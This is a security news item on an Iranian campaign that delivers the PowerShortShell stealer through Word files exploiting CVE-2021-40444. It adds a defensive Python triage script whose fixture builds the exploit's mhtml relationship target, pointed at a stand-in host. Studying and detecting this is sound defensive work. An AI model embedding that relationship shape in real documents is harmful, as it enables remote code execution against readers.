An Iranian threat actor has been discovered stealing Instagram and Google credentials from Farsi-speaking individuals around the world. The group is using PowerShortShell, a new PowerShell-based stealer, in this campaign.
The attacks began in July with spear-phishing emails carrying Microsoft Word (Winword) attachments aimed at Windows users.
The attachments exploit CVE-2021-40444, a remote code execution flaw in MSHTML, the Windows browser rendering engine that Office uses for embedded web content, which was disclosed months earlier. The flaw has been exploited to gain initial access and deliver Cobalt Strike Beacon loaders.
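The public CVE-2021-40444 maldocs carried the exploit in the document's relationship file (word/_rels/document.xml.rels): an OLE object relationship whose external target used the mhtml: protocol handler, typically chained with "!x-usc:" to reach the attacker's hosted HTML stage. That gives a cheap triage check for inbound Word attachments. The script below is an added example written for this page, not code from the original article, from SafeBreach, or from any of the reports it cites; the sample documents it builds, including the example.invalid host, are constructed inline for the demonstration.

```python
import io
import re
import zipfile
from typing import List

# Relationship targets seen in public CVE-2021-40444 maldocs: the Target
# attribute starts with the mhtml: handler (often "mhtml:http://...!x-usc:...").
MHTML_TARGET = re.compile(r'Target="(mhtml:[^"]*)"', re.IGNORECASE)


def find_mhtml_targets(docx_bytes: bytes) -> List[str]:
    """Return every relationship Target in a .docx that uses the mhtml: handler.

    A .docx is a zip archive; all *.rels parts are scanned, not only
    word/_rels/document.xml.rels, so a relationship hidden in another part
    (a header, footer or embedded object) is also reported.
    """
    hits: List[str] = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            xml = zf.read(name).decode("utf-8", errors="replace")
            hits.extend(m.group(1) for m in MHTML_TARGET.finditer(xml))
    return hits


def is_suspicious(docx_bytes: bytes) -> bool:
    """True when the document references an mhtml: target (triage flag, not a verdict)."""
    return bool(find_mhtml_targets(docx_bytes))


def build_docx(rels_xml: str) -> bytes:
    """Build a minimal .docx-shaped zip around the given relationships part.

    Constructed test fixture: only the parts needed for the scan are present.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


# Constructed sample: the relationship shape used by the public exploit
# documents, pointed at a non-routable host (example.invalid).
MALICIOUS_RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    '<Relationship Id="rId5" '
    'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" '
    'Target="mhtml:http://example.invalid/word.html!x-usc:http://example.invalid/word.html" '
    'TargetMode="External"/>'
    '</Relationships>'
)

# Constructed sample: an ordinary document with only internal relationships.
CLEAN_RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    '<Relationship Id="rId1" '
    'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" '
    'Target="styles.xml"/>'
    '</Relationships>'
)


if __name__ == "__main__":
    for label, rels in (("malicious", MALICIOUS_RELS), ("clean", CLEAN_RELS)):
        doc = build_docx(rels)
        print(label, is_suspicious(doc), find_mhtml_targets(doc))
```

Treat a hit as a reason to detonate or quarantine the file, not as proof of exploitation, and treat a miss the same way in reverse: later samples obfuscated or restructured the relationship, so a scan of the relationship text alone is a first-pass filter, not a replacement for sandboxing or for the vendor patch.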
Read More: Cyware